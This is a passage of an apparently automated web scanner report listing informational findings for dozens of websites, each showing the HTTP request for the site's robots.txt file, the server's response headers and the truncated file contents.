The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.broadbandsports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:34 GMT
Server: Apache/2.2.3 (Fedora)
Last-Modified: Wed, 22 Dec 2010 04:17:45 GMT
ETag: "52a8402-135e-8f80c40"
Accept-Ranges: bytes
Content-Length: 4958
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:
# Alexa
#User-agent: ia_archiver
#Disallow: /
User-agent: fast-webcrawler
Disallow: /aggregator
Disallow: /tracker
Disallow: /comment/reply
Disallow: /node/
...[SNIP]...

26.189. http://www.brostoons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brostoons.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brostoons.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:28 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 10:15:07 GMT
ETag: "157365c-35-4c0e182b"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/
Disallow: /cgi/

26.190. http://www.brusselsjournal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brusselsjournal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.brusselsjournal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 23 Dec 2010 16:43:14 GMT
Accept-Ranges: bytes
Content-Length: 1858
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:12:22 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.191. http://www.btdirect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.btdirect.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.btdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 181
Content-Type: text/plain
Last-Modified: Mon, 24 Nov 2008 16:26:10 GMT
Accept-Ranges: bytes
ETag: "03d65c514ec91:4f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:45:24 GMT
Connection: close

User-agent: *
Crawl-delay: 5
Disallow: /cgi-bin/
Disallow: /store/en_US/common/
Disallow: /store/en_US/email/
Disallow: /store/en_US/global/
Disallow: /store/en_US/test/

26.192. http://www.buildlastingsuccess.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buildlastingsuccess.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buildlastingsuccess.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:19 GMT
Server: Apache
Last-Modified: Mon, 14 Dec 2009 17:05:15 GMT
ETag: "56-46f468c0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /direct.php
Disallow: /r.php
Disallow: /rl.php
Disallow: /mc/

26.193. http://www.bullied-by-her-dad.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bullied-by-her-dad.info
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bullied-by-her-dad.info

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:34 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "301b0ca-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.194. http://www.burton.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burton.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.burton.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 17:44:32 GMT
Content-Type: text/plain
Cache-Control: max-age=25160
Expires: Tue, 03 May 2011 17:44:16 GMT
Date: Tue, 03 May 2011 10:44:56 GMT
Content-Length: 216
Connection: close

User-agent: *
Disallow: ?dwvar*
Disallow: &dwvar*
Sitemap: http://www.burton.com/sitemap_index.xml

User-agent: Googlebot
Disallow: /on/demandware.store/Sites-Burton_US-Site/default/News-IRideFo
...[SNIP]...

26.195. http://www.buymebeauty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buymebeauty.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.buymebeauty.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 11:38:11 GMT
Content-Length: 1014
Content-Type: text/plain
Last-Modified: Tue, 02 Feb 2010 18:11:00 GMT
Accept-Ranges: bytes
ETag: "1ed0e71233a4ca1:46c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *

Disallow: /admin/
Disallow: /affiliatewiz/
Disallow: /eproducts/
Disallow: /themes/
# 7.x values
User-agent: *

Disallow: /admin/
Disallow: /affiliatewiz/
Disallow: /eprodu
...[SNIP]...

26.196. http://www.cabinetparts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cabinetparts.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabinetparts.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:00 GMT
Server: Apache
Last-Modified: Mon, 12 Jul 2010 01:27:09 GMT
ETag: "690ae9-33d-48b26a6b8f540"
Accept-Ranges: bytes
Content-Length: 829
P3P: policyref="http://www.cabinetparts.com/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV TAIi PSA PSD OUR STP UNI"
Connection: close
Content-Type: text/plain

Sitemap: http://www.cabinetparts.com/sitemap.xml
User-agent: *
Disallow: /inc/
Disallow: /members/
Disallow: /saved_cart/
Disallow: /cart/
Disallow: /search/
Disallow: /about/
Disallow: /frien
...[SNIP]...

26.197. http://www.cabinsusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cabinsusa.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cabinsusa.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:40 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Wed, 23 Dec 2009 22:16:28 GMT
ETag: "e94235-91-ac862700"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stats
Disallow: /administration
Sitemap : http://www.cabinsusa.com/sitemap/sitemap.php?do=showsitemap&sm=sitemap.xml.gz

26.198. http://www.cafe.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafe.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cafe.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-control: no-cache="set-cookie"
Content-Type: text/plain
Date: Tue, 03 May 2011 11:38:47 GMT
ETag: "0ff982be769cb1:0"
Last-Modified: Tue, 12 Oct 2010 08:26:30 GMT
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Server: Microsoft-IIS/7.0
Set-Cookie: guest=-15688471; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: lastaction=5/3/2011 11:38:47 AM; domain=.cafe.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: AWSELB=4B9F6D83168D6A48ED28A11AEA43DBB45031A1E282F5DC944339ADEFFF5D1448E1E4B0ECC696BAE3C2F5CF51C81BEFA1879A91BE6C5E02B5DBFEF7B8ED5BA7819C73AAEEC3;PATH=/;MAX-AGE=300
X-Powered-By: ASP.NET
Content-Length: 902
Connection: Close

User-agent: *
Disallow: /__Admin/
Disallow: /App_Themes/
Disallow: /Boosts/
Disallow: /EmailTemplates/
Disallow: /Games_Avatars/
Disallow: /Games/UserControls/
Disallow: /Free_Games/UserControls/
Disa
...[SNIP]...

26.199. http://www.cajungrocer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cajungrocer.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cajungrocer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:09:33 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 04 Apr 2011 16:28:59 GMT
ETag: "8452b-207-41b7c8c0"
Accept-Ranges: bytes
Content-Length: 519
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: sitemapindex.xml
Disallow: sitemapcategories.xml
Disallow: sitemapproducts.xml
Disallow: sitemapother.xml
Disallow: /login.php
Disallow: /shopping_cart.php
Disallow: /cr
...[SNIP]...

26.200. http://www.calvary-kids-pages.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.calvary-kids-pages.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.calvary-kids-pages.com

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:57:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 09 Feb 2009 03:26:52 GMT
Accept-Ranges: bytes
Content-Length: 1075
Content-Type: text/plain
Age: 0
Server: YTS/1.19.8

User-agent: *
Disallow: /5a204.html
Disallow: /jesus-heals-the-blind-man.txt
Disallow: /pz233.html
Disallow: /JWOJ-craft.html
Disallow: /CJR-craft.html
Disallow: /miteCFT.txt
Disallow: /pz195.h
...[SNIP]...

26.201. http://www.cambriacove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambriacove.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cambriacove.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:49 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 22:24:30 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt for http://www.cambriacove.com/

User-agent: *
Disallow: /assets
Disallow: /admin
Disallow: /checkout
Disallow: /css
Disallow: /custserv
Disallow: /includes
Disallow: /js
Disallow: /manag
...[SNIP]...

26.202. http://www.campclearwater.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.campclearwater.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.campclearwater.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:29 GMT
Server: Apache
X-Pingback: http://campclearwater.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.203. http://www.canalstreetchronicles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.canalstreetchronicles.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.canalstreetchronicles.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:24 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Tue, 15 Mar 2011 11:45:38 GMT
ETag: "7e17e2-d0-49e83f79c2397"
Accept-Ranges: bytes
Content-Length: 208
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

26.204. http://www.caraddict4addicts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.caraddict4addicts.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.caraddict4addicts.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:48:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 12 Feb 2011 01:26:22 GMT
ETag: "bee16a-23-49c0bb3cd6b80"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

# go away
User-agent: *
Disallow: /

26.205. http://www.cardschat.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cardschat.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cardschat.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/4.4.9
Last-Modified: Mon, 24 Jan 2011 17:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1366
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /sites/
Disallow: /ads/
Disallow: /targetlinks.js
Disallow: /rd.php
Disallow: /arcade.php
Disallow: /avatar.php
Disallow: /attachment.php
Disallow: /cache/
Disallow: /calendar.
...[SNIP]...

26.206. http://www.careersandcolleges.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careersandcolleges.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.careersandcolleges.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:11 GMT
Server: Apache/2.0.52 (Oracle)
P3P: policyref="http://www.careersandcolleges.com/tp2/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
ETag: W/"104-1240598360000"
Last-Modified: Fri, 24 Apr 2009 18:39:20 GMT
Content-Length: 104
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *
Disallow: /up/
Disallow: /a/

Sitemap: http://www.careersandcolleges.com/sitemap.xml

26.207. http://www.carolinarustica.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carolinarustica.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carolinarustica.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 852
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:24:47 GMT
Connection: keep-alive

# ROBOTS.TXT: 9/15/2009
# keep all bots out of the listed files and folders

User-agent: ia_archiver
Disallow:

User-agent: baiduspider
Disallow: /

sitemap: http://www.carolinarustica.co
...[SNIP]...

26.208. http://www.carpictures.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carpictures.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.carpictures.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:56 GMT
Server: Apache
Last-Modified: Wed, 13 Apr 2011 14:18:49 GMT
ETag: "14e006f-e9-4a0cd7cc70440"
Accept-Ranges: bytes
Content-Length: 233
Cache-Control: max-age=604800, public
Expires: Tue, 10 May 2011 10:33:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /wikislurp/
Disallow: /newadditions/
Disallow: /newadditions_2/
Disallow: /search/index_year.php?*
Disallow: /search/index_year_asc.php?*
Disallow: /search/index_make.php?*
Dis
...[SNIP]...

26.209. http://www.cascadedesigns.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cascadedesigns.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cascadedesigns.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 20 May 2009 21:31:52 GMT
Accept-Ranges: bytes
ETag: "f3d1186492d9c91:de7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:46:12 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.210. http://www.cashexplosionshow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cashexplosionshow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cashexplosionshow.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:26 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.cashexplosionshow.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.cashexplosionshow.com/sitemap.xml.gz

26.211. http://www.cashstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cashstore.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cashstore.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
ETag: "1244f84-624-48f94dd34cf00"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:19:23 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

26.212. http://www.casinator.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.casinator.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.casinator.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:07 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 04:25:13 GMT
ETag: "11c5c76-82-4d22a129"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /_private/
Disallow: /_vti_bin/
Disallow: /rate/
Disallow: /stats/
Disallow: /statshistory/
Disallow: /go/

26.213. http://www.cayenne.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cayenne.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cayenne.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 20 Jul 2010 17:35:01 GMT
ETag: "fe8d64-72-48bd51ad05b40"
Accept-Ranges: bytes
Content-Length: 114
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 11:22:49 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow:
Disallow: /cms/
Disallow: /api/
Sitemap: http://www.cayenne.com/sitemap.xml

26.214. http://www.cbmove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbmove.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbmove.com

Response

HTTP/1.1 200 OK
Set-Cookie: cbmove.com=R1219450306; path=/; expires=Tue, 03-May-2011 13:28:32 GMT
Content-Type: text/plain
Last-Modified: Tue, 09 Nov 2010 20:41:39 GMT
Accept-Ranges: bytes
ETag: "4a85d824e80cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:17:40 GMT
Connection: close
Content-Length: 70

User-agent: *
Allow: /
Sitemap: http://www.cbmove.com/sitemap.ashx

26.215. http://www.ccnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccnow.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ccnow.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:30:30 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 21 Apr 2011 17:59:59 GMT
ETag: "24-4db0709f"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /cgi-local/

26.216. http://www.ccsdschools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccsdschools.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ccsdschools.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:16:54 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Sun, 09 Mar 2008 04:31:00 GMT
ETag: "7dc076-7c-8de70900"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.217. http://www.cdburnerxp.se/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdburnerxp.se
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cdburnerxp.se

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:21 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Last-Modified: Sat, 02 Oct 2010 14:34:26 GMT
ETag: "440222-26-491a335415fe3"
Accept-Ranges: bytes
Content-Length: 38
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=604800, public
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: memberlist.php

26.218. http://www.celebies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.celebies.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebies.com

Response

HTTP/1.1 200 OK
Content-Length: 111
Content-Type: text/plain
Last-Modified: Fri, 25 May 2007 02:57:43 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:41:50 GMT
Connection: close

Sitemap: http://beta.celebscentral.net/sitemapindex.xml

User-agent: *
Disallow: /ajax/
Disallow: /account/

26.219. http://www.celebrific.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.celebrific.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebrific.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.celebrific.com/xmlrpc.php
Set-Cookie: PHPSESSID=3c30a07afba5f5ed290bae0e2321e0da; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.220. http://www.census-online.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.census-online.us
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.census-online.us

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:35 GMT
Server: Apache
Last-Modified: Fri, 19 Mar 2010 01:33:38 GMT
ETag: "1502f4-4d-4821d56288080"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /search

26.221. http://www.centralmarket.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.centralmarket.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.centralmarket.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 25 Nov 2008 17:53:41 GMT
Accept-Ranges: bytes
ETag: "641b9dc0264fc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:33 GMT
Connection: close
Content-Length: 215

User-Agent: *
Disallow: /sec/
Disallow: /heb/
Disallow: /images/
Disallow: /cm/
Disallow: /utility/
Disallow: /Stores/stores.aspx
Disallow: /export/
Disallow: /flash/
Disallow: /FlashData.asp
...[SNIP]...

26.222. http://www.cerritos.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cerritos.edu
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cerritos.edu

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/plain
Last-Modified: Tue, 05 May 2009 22:44:41 GMT
Accept-Ranges: bytes
ETag: "c8decd13d3cdc91:26d5"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:41:37 GMT
Connection: close

# Robots.txt file

User-agent: *
Disallow: /schedule/
Disallow: /webmodule/
Disallow: /login/
Disallow: /webmodule/
Disallow: /hidden/
Disallow: /macweb/
Disallow: /site-map.htm
Disallow: /_
...[SNIP]...

26.223. http://www.charter-business.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.charter-business.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charter-business.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Content-Location: http://www.charter-business.com/robots.txt
Last-Modified: Wed, 20 Apr 2011 20:40:40 GMT
Accept-Ranges: bytes
ETag: "014ee359bffcb1:1d32"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:16:34 GMT
Connection: close
Set-Cookie: BIGipServerCharterBusiness_WebTier=1149020352.0.0000; path=/

User-agent: *
Disallow: /eDocuments/
Disallow: /OMT/
Allow: /

26.224. http://www.chasing-fireflies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chasing-fireflies.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chasing-fireflies.com

Response

HTTP/1.1 200 OK
Content-Length: 81
Content-Type: text/plain
Last-Modified: Wed, 01 Jul 2009 17:18:46 GMT
Accept-Ranges: bytes
ETag: "5fe39ffd6ffac91:2383d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:39:31 GMT
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.chasing-fireflies.com/sitemap.xml

26.225. http://www.cheaptalkwireless.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaptalkwireless.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheaptalkwireless.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:30 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.226. http://www.checkcity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.checkcity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

